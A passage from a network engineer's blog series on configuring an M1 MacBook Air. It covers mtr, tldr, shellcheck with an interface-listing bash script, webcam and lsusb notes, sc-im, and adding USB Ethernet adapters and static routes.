<span style="color: #ff6600;">3.</span> AS<span style="background-color: #ffaaaa; color: #aa0000;">???</span> dtr01hsprca<span style="color: #555555;">-</span>tge<span style="color: #555555;">-</span><span style="color: #ff6600;">0</span><span style="color: #555555;">-</span><span style="color: #ff6600;">0</span><span style="color: #555555;">-</span><span style="color: #ff6600;">0</span><span style="color: #555555;">-</span><span style="color: #ff6600;">4.</span>hspr<span style="color: #555555;">.</span>ca<span style="color: #555555;">.</span>charter<span style="color: #555555;">.</span>com (<span style="color: #ff6600;">96.34</span><span style="color: #555555;">.</span><span style="color: #ff6600;">100.96</span>) <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> <span style="color: #ff6600;">19</span> <span style="color: #ff6600;">16.0</span> <span style="color: #ff6600;">16.7</span> <span style="color: #ff6600;">13.1</span> <span style="color: #ff6600;">41.3</span> <span style="color: #ff6600;">6.2</span>
<span style="color: #ff6600;">4.</span> AS20115 <span style="color: #ff6600;">024</span><span style="color: #555555;">-</span><span style="color: #ff6600;">180</span><span style="color: #555555;">-</span><span style="color: #ff6600;">019</span><span style="color: #555555;">-</span><span style="color: #ff6600;">029.</span>biz<span style="color: #555555;">.</span>spectrum<span style="color: #555555;">.</span>com (<span style="color: #ff6600;">24.180</span><span style="color: #555555;">.</span><span style="color: #ff6600;">19.29</span>) <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> <span style="color: #ff6600;">18</span> <span style="color: #ff6600;">17.4</span> <span style="color: #ff6600;">17.4</span> <span style="color: #ff6600;">13.2</span> <span style="color: #ff6600;">26.2</span> <span style="color: #ff6600;">3.7</span>
<span style="color: #ff6600;">5.</span> AS<span style="background-color: #ffaaaa; color: #aa0000;">???</span> bbr02atlnga<span style="color: #555555;">-</span>bue<span style="color: #555555;">-</span><span style="color: #ff6600;">1.</span>atln<span style="color: #555555;">.</span>ga<span style="color: #555555;">.</span>charter<span style="color: #555555;">.</span>com (<span style="color: #ff6600;">96.34</span><span style="color: #555555;">.</span><span style="color: #ff6600;">3.18</span>) <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> <span style="color: #ff6600;">18</span> <span style="color: #ff6600;">26.9</span> <span style="color: #ff6600;">27.2</span> <span style="color: #ff6600;">12.0</span> <span style="color: #ff6600;">78.8</span> <span style="color: #ff6600;">20.1</span>
<span style="color: #ff6600;">6.</span> AS<span style="background-color: #ffaaaa; color: #aa0000;">???</span> bbr02chcgil<span style="color: #555555;">-</span>tge<span style="color: #555555;">-</span><span style="color: #ff6600;">0</span><span style="color: #555555;">-</span><span style="color: #ff6600;">2</span><span style="color: #555555;">-</span><span style="color: #ff6600;">0</span><span style="color: #555555;">-</span><span style="color: #ff6600;">1.</span>chcg<span style="color: #555555;">.</span>il<span style="color: #555555;">.</span>charter<span style="color: #555555;">.</span>com (<span style="color: #ff6600;">96.34</span><span style="color: #555555;">.</span><span style="color: #ff6600;">3.129</span>) <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> <span style="color: #ff6600;">18</span> <span style="color: #ff6600;">18.5</span> <span style="color: #ff6600;">16.9</span> <span style="color: #ff6600;">14.7</span> <span style="color: #ff6600;">19.5</span> <span style="color: #ff6600;">1.4</span>
<span style="color: #ff6600;">7.</span> AS396998 <span style="color: #ff6600;">206.223</span><span style="color: #555555;">.</span><span style="color: #ff6600;">123.156</span> (<span style="color: #ff6600;">206.223</span><span style="color: #555555;">.</span><span style="color: #ff6600;">123.156</span>) <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> <span style="color: #ff6600;">18</span> <span style="color: #ff6600;">18.6</span> <span style="color: #ff6600;">24.8</span> <span style="color: #ff6600;">15.4</span> <span style="color: #ff6600;">37.6</span> <span style="color: #ff6600;">8.1</span>
<span style="color: #ff6600;">8.</span> AS209242 <span style="color: #ff6600;">199.60</span><span style="color: #555555;">.</span><span style="color: #ff6600;">103.2</span> (<span style="color: #ff6600;">199.60</span><span style="color: #555555;">.</span><span style="color: #ff6600;">103.2</span>) <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> <span style="color: #ff6600;">18</span> <span style="color: #ff6600;">15.6</span> <span style="color: #ff6600;">16.2</span> <span style="color: #ff6600;">13.9</span> <span style="color: #ff6600;">22.1</span> <span style="color: #ff6600;">2.0</span>
</pre></div>
<p><br /></p><h4 style="text-align: left;">Using TCP or UDP instead of ICMP</h4><div style="text-align: left;">sudo mtr --tcp -b -y 0 www.vectorusa.com<br />sudo mtr --udp -b -y 0 www.vectorusa.com</div><p><br /></p><h3 style="text-align: left;">References</h3><div style="text-align: left;"><a href="https://www.tecmint.com/mtr-a-network-diagnostic-tool-for-linux/">MTR – A Network Diagnostic Tool for Linux (macOS)<br /></a><a href="https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/">Updating the path variable</a></div><div style="text-align: left;"><a href="https://github.com/traviscross/mtr/issues/204">mtr github page</a></div><p><br /></p><p><br /></p><h4><br class="Apple-interchange-newline" /></h4><h3 style="text-align: left;">tldr</h3><p><b>brew install tldr</b></p><p><br /></p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="background-color: #ffaaaa; color: #aa0000;">┌─</span>[mhubbard<span style="color: #9999ff;">@HP8600</span><span style="color: #555555;">-</span><span style="color: #ff6600;">4</span>] <span style="color: #555555;">-</span> [<span style="color: #555555;">~/.</span>ssh] <span style="color: #555555;">-</span> [<span style="color: #ff6600;">3255</span>]
<span style="background-color: #ffaaaa; color: #aa0000;">└─</span>[<span style="background-color: #ffaaaa; color: #aa0000;">$</span>] tldr mtr [<span style="color: #ff6600;">20</span>:<span style="color: #ff6600;">34</span>:<span style="color: #ff6600;">50</span>]
mtr
Matt<span style="color: #cc3300;">'s Traceroute: combined traceroute and ping tool.</span>
More information: <span style="color: #555555;"><</span>https:<span style="color: #555555;">//</span>bitwizard<span style="color: #555555;">.</span>nl<span style="color: #555555;">/</span>mtr<span style="color: #555555;">>.</span>
<span style="color: #555555;">-</span> Traceroute to a host <span style="color: black; font-weight: bold;">and</span> continuously ping <span style="color: #336666;">all</span> intermediary hops:
mtr host
<span style="color: #555555;">-</span> Disable IP address <span style="color: black; font-weight: bold;">and</span> host name mapping:
mtr <span style="color: #555555;">-</span>n host
<span style="color: #555555;">-</span> Generate output after pinging each hop <span style="color: #ff6600;">10</span> times:
mtr <span style="color: #555555;">-</span>w host
<span style="color: #555555;">-</span> Force IP IPv4 <span style="color: black; font-weight: bold;">or</span> IPV6:
mtr <span style="color: #555555;">-</span><span style="color: #ff6600;">4</span> host
<span style="color: #555555;">-</span> Wait <span style="color: #006699; font-weight: bold;">for</span> a given time (<span style="color: black; font-weight: bold;">in</span> seconds) before sending another packet to the same hop:
mtr <span style="color: #555555;">-</span>i seconds host
</pre></div>
<p><br /></p><p><br /></p><h3 id="shellcheck" style="text-align: left;">Shellcheck</h3><p><br /></p><h4 style="text-align: left;">Installation</h4><p>brew install shellcheck</p><div style="text-align: left;">To demonstrate the power of shell scripting, here is a shell script I found on Stackexchange.com that parses ifconfig and outputs:</div><div style="text-align: left;"><ul style="text-align: left;"><li>Network Service</li><li>Interface Name</li><li>MAC address</li><li>IPv4 address </li></ul></div><div style="text-align: left;">of any active interface.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">In this example, I had wifi and a USB-C Ethernet adapter connected.</div><div style="text-align: left;"><br />
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">bash networkservice.sh [10:32:38]
Wi-Fi, en0, 50:ed:3c:22:be:32, 192.168.10.148
USB 10/100/1000 LAN, en11, 00:e0:4c:68:0a:0d, 10.10.100.2
</pre></div>
<br />If you want to include the IPv6 address, modify <b><i>awk '/inet /{print $2}'</i></b> and remove the space after inet.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Here is the script. Paste it into sublime text and then save it in a directory on your path. I created a folder - /Users/mhubbard/bin, to save tools in.</div><div style="text-align: left;"><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #0099ff; font-style: italic;">#!/bin/bash</span>
<span style="color: #006699; font-weight: bold;">while </span><span style="color: #336666;">read</span> -r line; <span style="color: #006699; font-weight: bold;">do</span>
<span style="color: #006699; font-weight: bold;"> </span><span style="color: #003333;">sname</span><span style="color: #555555;">=</span><span style="color: #006699; font-weight: bold;">$(</span><span style="color: #336666;">echo</span> <span style="color: #cc3300;">"$line"</span> | awk -F <span style="color: #cc3300;">"(, )|(: )|[)]"</span> <span style="color: #cc3300;">'{print $2}'</span><span style="color: #006699; font-weight: bold;">)</span>
<span style="color: #003333;">sdev</span><span style="color: #555555;">=</span><span style="color: #006699; font-weight: bold;">$(</span><span style="color: #336666;">echo</span> <span style="color: #cc3300;">"$line"</span> | awk -F <span style="color: #cc3300;">"(, )|(: )|[)]"</span> <span style="color: #cc3300;">'{print $4}'</span><span style="color: #006699; font-weight: bold;">)</span>
<span style="color: #0099ff; font-style: italic;">#echo "Current service: $sname, $sdev, $currentservice"</span>
<span style="color: #006699; font-weight: bold;">if</span> <span style="color: #555555;">[</span> -n <span style="color: #cc3300;">"$sdev"</span> <span style="color: #555555;">]</span>; <span style="color: #006699; font-weight: bold;">then</span>
<span style="color: #006699; font-weight: bold;"> </span><span style="color: #003333;">ifout</span><span style="color: #555555;">=</span><span style="color: #cc3300;">"$(ifconfig "</span><span style="color: #003333;">$sdev</span><span style="color: #cc3300;">" 2>/dev/null)"</span>
<span style="color: #336666;">echo</span> <span style="color: #cc3300;">"$ifout"</span> | grep <span style="color: #cc3300;">'status: active'</span> > /dev/null 2>&1
<span style="color: #003333;">rc</span><span style="color: #555555;">=</span><span style="color: #cc3300;">"$?"</span>
<span style="color: #006699; font-weight: bold;">if</span> <span style="color: #555555;">[</span> <span style="color: #cc3300;">"$rc"</span> -eq 0 <span style="color: #555555;">]</span>; <span style="color: #006699; font-weight: bold;">then</span>
<span style="color: #006699; font-weight: bold;"> </span><span style="color: #003333;">currentservice</span><span style="color: #555555;">=</span><span style="color: #cc3300;">"$sname"</span>
<span style="color: #003333;">currentdevice</span><span style="color: #555555;">=</span><span style="color: #cc3300;">"$sdev"</span>
<span style="color: #003333;">currentmac</span><span style="color: #555555;">=</span><span style="color: #006699; font-weight: bold;">$(</span><span style="color: #336666;">echo</span> <span style="color: #cc3300;">"$ifout"</span> | awk <span style="color: #cc3300;">'/ether/{print $2}'</span><span style="color: #006699; font-weight: bold;">)</span>
<span style="color: #003333;">currentIP</span><span style="color: #555555;">=</span><span style="color: #006699; font-weight: bold;">$(</span><span style="color: #336666;">echo</span> <span style="color: #cc3300;">"$ifout"</span> | awk <span style="color: #cc3300;">'/inet /{print $2}'</span><span style="color: #006699; font-weight: bold;">)</span>
<span style="color: #0099ff; font-style: italic;"># may have multiple active devices, so echo it here</span>
<span style="color: #336666;">echo</span> <span style="color: #cc3300;">"$currentservice, $currentdevice, $currentmac, $currentIP"</span>
<span style="color: #006699; font-weight: bold;">fi</span>
<span style="color: #006699; font-weight: bold;"> fi</span>
<span style="color: #006699; font-weight: bold;">done</span> <span style="color: #555555;"><<<</span> <span style="color: #cc3300;">"$(networksetup -listnetworkserviceorder | grep 'Hardware Port')"</span>
<span style="color: #006699; font-weight: bold;">if</span> <span style="color: #555555;">[</span> -z <span style="color: #cc3300;">"$currentservice"</span> <span style="color: #555555;">]</span>; <span style="color: #006699; font-weight: bold;">then</span>
>&2 <span style="color: #336666;">echo</span> <span style="color: #cc3300;">"Could not find current service"</span>
<span style="color: #336666;">exit </span>1
<span style="color: #006699; font-weight: bold;">fi</span>
</pre></div>
<div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><h4 style="text-align: left;">References</h4><div style="text-align: left;"><a href="https://www.cyberciti.biz/programming/improve-your-bashsh-shell-script-with-shellcheck-lint-script-analysis-tool/" target="_blank">Improve your bash shell script with shellcheck a script analysis tool<br /></a><a href="https://linuxcommand.org/lc3_learning_the_shell.php" target="_blank">Learning the Shell<br /></a><a href="https://apple.stackexchange.com/questions/191879/how-to-find-the-currently-connected-network-service-from-the-command-line" target="_blank">How to find the currently connected network service from the command line?<br /></a><a href="https://stackoverflow.com/questions/941338/how-to-pass-command-line-arguments-to-a-shell-alias" target="_blank">How to pass command line arguments to a shell alias?</a></div><p><br /></p><h3 id="debut" style="text-align: left;">Debut WebCam software</h3><p>I bought an inexpensive endoscope off of eBay for about $15.00. On Linux, it worked with the built-in Cheese webcam software. On the Mac I couldn't figure out how to get Facetime to work with it so I had to do some research. </p><p>After I connected the endoscope, I ran lsusb (list USB) that I installed using "brew install lsusb" and it listed the following for the camera:</p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">lsusb
Bus <span style="color: #ff6600;">001</span> Device <span style="color: #ff6600;">001</span><span style="color: #555555;">:</span> ID <span style="color: #ff6600;">2109</span><span style="color: #555555;">:</span><span style="color: #ff6600;">0817</span> VIA Labs, Inc. USB3<span style="color: #ff6600;">.0</span> Hub
Bus <span style="color: #ff6600;">001</span> Device <span style="color: #ff6600;">003</span><span style="color: #555555;">:</span> ID <span style="color: #ff6600;">0bda:</span><span style="color: #ff6600;">8153</span> Realtek Semiconductor Corp. USB <span style="color: #ff6600;">10</span><span style="color: #555555;">/</span><span style="color: #ff6600;">100</span><span style="color: #555555;">/</span><span style="color: #ff6600;">1000</span> LAN Serial<span style="color: #555555;">:</span> <span style="color: #ff6600;">000001</span>
Bus <span style="color: #ff6600;">001</span> Device <span style="color: #ff6600;">002</span><span style="color: #555555;">:</span> ID <span style="color: #ff6600;">2109</span><span style="color: #555555;">:</span><span style="color: #ff6600;">2817</span> VIA Labs, Inc. USB2<span style="color: #ff6600;">.0</span> Hub
Bus <span style="color: #ff6600;">001</span> Device <span style="color: #ff6600;">004</span><span style="color: #555555;">:</span> ID <span style="color: #ff6600;">1e4</span>e<span style="color: #555555;">:</span><span style="color: #ff6600;">0110</span> Etron Technology, Inc. USB2<span style="color: #ff6600;">.0</span> Camera
</pre></div>
<p>So I knew that the M1 recognized the device. I searched for Etron Technology and found the company website. They had software so I downloaded it. But, I never install software from from the Internet without running it through VirusTotal.com. 17 AV vendors found Potentially Unwanted Programs (PUPs) in the Etron software.<br /><br />The search also took me to the Logitech website for a package called "Capture". I found this in the description of Capture "Our webcams are USB Video Class (UVC) devices and driver support is built into Microsoft Windows 10 and macOS." So the endoscope must be a UVC device and the Mac has support built in. </p><p>Back to the search and I found an application that is free for personal use and worked fine. It's called Debut and you can download it <a href="https://www.nchsoftware.com/software/webcam.html">Debut webcam software</a>. Virus Total reported 0 issues for Debut.</p><p>The resolution of the endoscope is listed as 640x480 so it's pretty bad. I checked eBay tonight and found a couple endoscopes that claim 720P and 1600 x 1200 for about $25. They also say the work with macOS so they must be UVC also. They also come with wifi adapters so that they work with Android and IOS phones. The 1600x1200 resolution would be much better than the 640x480 on the $15 endoscope I bought.</p><p>I can hear you asking "Why does a network engineer need an endoscope?". Well, I dropped a brand new Cisco 10Gb Single Mode Fiber SFP and it went down the channel of the two post rack. There were several APC UPS units and batteries all way to the bottom of the rack so there was no way to reach in and recover it. I had a claw type tool in my truck but I couldn't see that far down the channel to get the SFP. </p><p>Luckily, I had spare SFPs and was able to come back after I got the endoscope. It has LEDs in it and I was able to use the endoscope to guide the claw to the SFP. Tonight I used the endoscope to guide a 1/4" socket onto a nut on the ice maker on my freezer. But that's a story for another day. </p><p>I was really more interested in explaining LSUSB and how to look at the USB devices that the M1 recognizes. </p><p><br /></p><h3 id="sc-im" style="text-align: left;">sc-im</h3><p>From the git repo:<br />Spreadsheet Calculator Improvised, aka sc-im, is an ncurses based, vim-like spreadsheet calculator.</p><p>Some of the features of sc-im</p><div style="text-align: left;"><ul style="text-align: left;"><li>Vim movements commands for editing cell content.</li><li>UNDO / REDO.</li><li>65.536 rows and 702 columns supported. (The number of rows can be expanded to 1.048.576 if wished).</li><li>CSV / TAB delimited / XLSX file import and export. ODS import. Markdown export.</li><li>Key-mappings.</li><li>Autobackup.</li><li>Direct color support - specifing the RGB values, screen colors can be customized by user, even at runtime.</li><li>Colorize cells or give them format such as bold, italic or underline.</li><li>Wide character support. The following alphabets are supported: English, Spanish, French, Italian, German, Portuguese, Russian, Ukrainian, Greek, Turkish, Czech, Japanese, Chinese.</li><li>Sort of rows.</li><li>Filter of rows.</li><li>Subtotals.</li><li>Cell shifting.</li><li>Clipboard support.</li><li>GNUPlot interaction.</li><li>Scripting support with LUA. Also with triggers and c dynamic linked modules.</li><li>Implement external functions in the language you prefer and use them in SC-IM.</li><li>Use SC-IM as a non-interactive calculator, reading its input from an external script.</li></ul></div><p><br /></p><p>This is a great utility for network engineers. I hate having to open Excel or Libre Calc just to grab some data from a csv file that was created for deployment. With sc-im I don't have to leave the terminal.</p><p>Here is a screenshot from a template I created for configuring several sites:<br /><br /><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhZJ-ksqLJV9Nu2D4fv2i9Mv8-Nw58Pjnnwk69EMXeKVljLr5-J6262Ao1zr6EjRx1e_ieSyZd8JxlGg09hlRUTeMcgFnb1L3nmQjwC7mPON4tET3D_92gRi7beu35URRuZNtB9WULqlRwPHuZfbZ1XC1ntc1NiYTBaiL2L6dDPWc6LHtV_L8D-YadPlw=s1848" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="410" data-original-width="1848" height="132" src="https://blogger.googleusercontent.com/img/a/AVvXsEhZJ-ksqLJV9Nu2D4fv2i9Mv8-Nw58Pjnnwk69EMXeKVljLr5-J6262Ao1zr6EjRx1e_ieSyZd8JxlGg09hlRUTeMcgFnb1L3nmQjwC7mPON4tET3D_92gRi7beu35URRuZNtB9WULqlRwPHuZfbZ1XC1ntc1NiYTBaiL2L6dDPWc6LHtV_L8D-YadPlw=w595-h132" width="595" /></a></div><br /><h4 style="text-align: left;">Installation</h4><p><b><i>brew install sc-im</i></b></p><p>Once it's installed simply run</p><p><b><i>sc-im <file name></i></b></p><p>in the case above:</p><p><i><b>sc-im rc-parks-idf_info.csv</b></i></p><h4 style="text-align: left;">Exiting sc-im</h4><p>sc-im uses vim key bindings by default. They are listed on the github README. </p><div>To quit, type ":q" and press enter</div><p>For reference, on Ubuntu, sc-im can open xlsx files.</p><p>An alias to view csv files.</p><p>If you just need to view a csv file with a limited number of columns, this alias works great</p><p><br /></p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #330099; font-weight: bold;">alias</span> <span style="color: #330099; font-weight: bold;">csv</span><span style="color: #555555;">=</span><span style="color: #cc3300;">'ls *.csv | pbcopy ; sed s/,/,:/g $(pbpaste) | column -t -s: | sed s/,//g | cut -c-180'</span>
</pre></div><p></p>
<p>Here is output of the alias in action:</p>
<p></p>
<!--HTML generated using hilite.me--><div style="background: rgb(255, 255, 255); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="font-weight: bold;">csv</span> [<span style="font-weight: bold;">21</span>:34:29]
<span style="font-weight: bold;">column</span>: <span style="font-weight: bold;">line</span> <span style="font-weight: bold;">too</span> <span style="font-weight: bold;">long</span>
<span style="font-weight: bold;">Name</span> <span style="font-weight: bold;">IP</span> <span style="font-weight: bold;">Site</span> <span style="border: 1px solid rgb(255, 0, 0);">#</span> <span style="font-weight: bold;">Name</span>
<span style="font-weight: bold;">voip-museum-g430</span> <span style="font-weight: bold;">10.90.80.50</span> <span style="font-weight: bold;">03</span> <span style="font-weight: bold;">Museum</span>
<span style="font-weight: bold;">Voip-uoc-g450</span> <span style="font-weight: bold;">10.80.152.5</span> <span style="font-weight: bold;">05</span> <span style="font-weight: bold;">Utilities</span> <span style="font-weight: bold;">Opration</span> <span style="font-weight: bold;">Center</span>
<span style="font-weight: bold;">voip-RPUgw-g430</span> <span style="font-weight: bold;">10.80.30.50</span> <span style="font-weight: bold;">06</span> <span style="font-weight: bold;">RPU</span> <span style="font-weight: bold;">Gateway</span>
<span style="font-weight: bold;">voip-pucm-g450</span> <span style="font-weight: bold;">10.80.138.50</span> <span style="font-weight: bold;">07</span> <span style="font-weight: bold;">Orange</span> <span style="font-weight: bold;">Square</span>
<span style="font-weight: bold;">voip-casa-g430</span> <span style="font-weight: bold;">10.80.196.50</span> <span style="font-weight: bold;">08</span> <span style="font-weight: bold;">UOC-CRC</span>
<span style="font-weight: bold;">voip-SpringsSub-g430</span> <span style="font-weight: bold;">10.80.160.50</span> <span style="font-weight: bold;">09</span> <span style="font-weight: bold;">UOC</span> <span style="font-weight: bold;">Springs</span> <span style="font-weight: bold;">Substation</span>
</pre></div>
@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com7tag:blogger.com,1999:blog-690329124282786689.post-84006413725196922732021-04-11T17:46:00.040-07:002021-11-28T22:07:21.056-08:00Apple MacBook Air M1 for Network Engineers Part 4<p>If you have been following along with parts 1-3, you now have macOS tuned up and some basic applications installed. If you need to review previous blogs in this series:</p><p></p><ul style="text-align: left;"><li><a href="https://mwhubbard.blogspot.com/2021/05/apple-macbook-air-m1-for-network.html">Apple MacBook Air M1 for Network Engineers Part 5</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_77.html">Apple MacBook Air M1 for Network Engineers Part </a>3</li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html">Apple MacBook Air M1 for Network Engineers Part 2</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network.html">Apple MacBook Air M1 for Network Engineers Part 1</a></li></ul><p>In part 4 we will:</p><p></p><ul style="text-align: left;"><li>Connect and configure USB Ethernet adapters</li><li><a href="https://mwhubbard.blogspot.com/2021/04/if-you-have-been-following-along-with.html#2ndAdapter">Add a second subnet to the adapter</a></li><li><a href="https://mwhubbard.blogspot.com/2021/04/if-you-have-been-following-along-with.html#tagging">Configure vlan tagging</a></li><li><a href="https://mwhubbard.blogspot.com/2021/04/if-you-have-been-following-along-with.html#IPv6">Take a quick look at IPv6</a></li><li><a href="https://mwhubbard.blogspot.com/2021/04/if-you-have-been-following-along-with.html#ICS">Enable Internet Connection Sharing</a> </li><li><a href="https://mwhubbard.blogspot.com/2021/04/if-you-have-been-following-along-with.html#LACP">Create an LACP bond</a></li><li><a href="https://mwhubbard.blogspot.com/2021/04/if-you-have-been-following-along-with.html#networksetup">Listing everything about the Network</a></li><li><a href="https://mwhubbard.blogspot.com/2021/04/if-you-have-been-following-along-with.html#airport">The Airport utility</a> - List wireless information</li></ul><p>In part 5 we will start installing terminal and networking applications like arp-scan, lldpd, cdpr, etc.</p><h4> Using USB Ethernet Adapters</h4><p>Big Sur makes it easy to configure USB Ethernet adapters using the Network Preferences app. Being a network engineer it's common for me to use two different USB Ethernet adapters at the same time. </p><div><ul><li>Connect one of the adapters</li><li>Open Network Preferences</li><li>Click the + sign on the bottom left of the panel</li><li>The new service dialog will open</li><li>Click the drop-down beside "Interface:" and select the adapter</li><li>You can give it a descriptive name or just click "create"</li></ul></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcn6YX72oezMMi-mUclwzWzIDIgUJM6QS8U5og59RqmF43xlNZ5KUvRKObWn0cBXw_jrvAQB56h2-pnXAwZL6jozOZdQtfdtFttEK0jZLPq8LFpoEPtEF7IOe1W0VDyU9BT6cVf7OFjPj7/s413/Screen+Shot+2021-04-18+at+19.08.12.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="161" data-original-width="413" height="171" id="id_4926_70e_87a9_46d8" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcn6YX72oezMMi-mUclwzWzIDIgUJM6QS8U5og59RqmF43xlNZ5KUvRKObWn0cBXw_jrvAQB56h2-pnXAwZL6jozOZdQtfdtFttEK0jZLPq8LFpoEPtEF7IOe1W0VDyU9BT6cVf7OFjPj7/w438-h171/Screen+Shot+2021-04-18+at+19.08.12.png" style="height: auto; width: 438px;" width="438" /></a></div><div><br /></div><div><ul style="text-align: left;"><li>Repeat if you need a second adapter.</li><li>Connect Ethernet cables to the adapter and switch.</li></ul></div><p>If both networks have DHCP running the interfaces will just come up. </p><p>If there is no DHCP server available, the interfaces will show "Not Connected". That took a little getting used to since normally you think having a link will make the interface go into connected status. </p><p><b>Note</b>: if you change an adapter from DHCP to Manual or Manual to DHCP you have to click Apply before the change goes into effect.</p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5EjPGTHog9GifDKaAr9eBMAW0_eb0R6Bgnc03opL-NXSFIp7fPu8-z__GkVHdT9Zf1aa9HmRQ6FWesBVLAUaz8WSWTOoOsimpB9qbh_ZCB7WeEgroMvDIhbOfRroMH_c2-gM58u05GxQf/s1560/Screen+Shot+2021-04-17+at+22.01.55.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1378" data-original-width="1560" height="408" id="id_b4e0_21c9_3438_613d" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5EjPGTHog9GifDKaAr9eBMAW0_eb0R6Bgnc03opL-NXSFIp7fPu8-z__GkVHdT9Zf1aa9HmRQ6FWesBVLAUaz8WSWTOoOsimpB9qbh_ZCB7WeEgroMvDIhbOfRroMH_c2-gM58u05GxQf/w461-h408/Screen+Shot+2021-04-17+at+22.01.55.png" style="height: auto; width: 461px;" width="461" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p>Notice that the second USB Ethernet adapter has a "2" appended to it. In this example, both adapters are identical Satechi USB-C adapters with 3 USB-A ports.<br /></p><p><br /></p><h3><b>Adding a route</b></h3><p>If you need to reach additional networks connected to one of the adapters you will probably need to add a route. It's easy to add a route on MacOS. </p><p>Let's say one of our adapters is connected to a surveillance network 10.29.1.0/24 with a gateway of .253. But there is another network 10.29.2.0/24 that you also need to access. You just need to add a route to 10.29.2.0/24.</p><p>Open Terminal</p><p></p><p>Type:</p><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;">sudo route add <span style="color: #ff6600;">10.29</span><span style="color: #555555;">.</span><span style="color: #ff6600;">2.0</span><span style="color: #555555;">/</span><span style="color: #ff6600;">24</span> <span style="color: #ff6600;">10.29</span><span style="color: #555555;">.</span><span style="color: #ff6600;">1.253</span>
</pre></div><p><br /></p><p>To display the routing table</p><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;">netstat <span style="color: #555555;">-</span>nr
Routing tables
Internet:
Destination Gateway Flags Netif Expire
default <span style="color: #ff6600;">192.168</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.254</span> UGSc en0
default <span style="color: #ff6600;">10.29</span><span style="color: #555555;">.</span><span style="color: #ff6600;">1.253</span> UGScI en9
<span style="color: #ff6600;">10.29</span><span style="color: #555555;">.</span><span style="color: #ff6600;">1</span><span style="color: #555555;">/</span><span style="color: #ff6600;">24</span> link<span style="color: #0099ff; font-style: italic;">#22 UCS en9 !</span>
<span style="color: #ff6600;">10.29</span><span style="color: #555555;">.</span><span style="color: #ff6600;">1.100</span><span style="color: #555555;">/</span><span style="color: #ff6600;">32</span> link<span style="color: #0099ff; font-style: italic;">#22 UCS en9 !</span>
<span style="color: #ff6600;">10.29</span><span style="color: #555555;">.</span><span style="color: #ff6600;">1.253</span><span style="color: #555555;">/</span><span style="color: #ff6600;">32</span> link<span style="color: #0099ff; font-style: italic;">#22 UCS en9 !</span>
<span style="color: #ff6600;">10.29</span><span style="color: #555555;">.</span><span style="color: #ff6600;">1.253</span> link<span style="color: #0099ff; font-style: italic;">#22 UHLWIir en9 !</span>
<span style="color: #ff6600;">10.29</span><span style="color: #555555;">.</span><span style="color: #ff6600;">2</span><span style="color: #555555;">/</span><span style="color: #ff6600;">24</span> <span style="color: #ff6600;">10.29</span><span style="color: #555555;">.</span><span style="color: #ff6600;">1.253</span> UGSc en9
<span style="color: #ff6600;">127</span> <span style="color: #ff6600;">127.0</span><span style="color: #555555;">.</span><span style="color: #ff6600;">0.1</span> UCS lo0
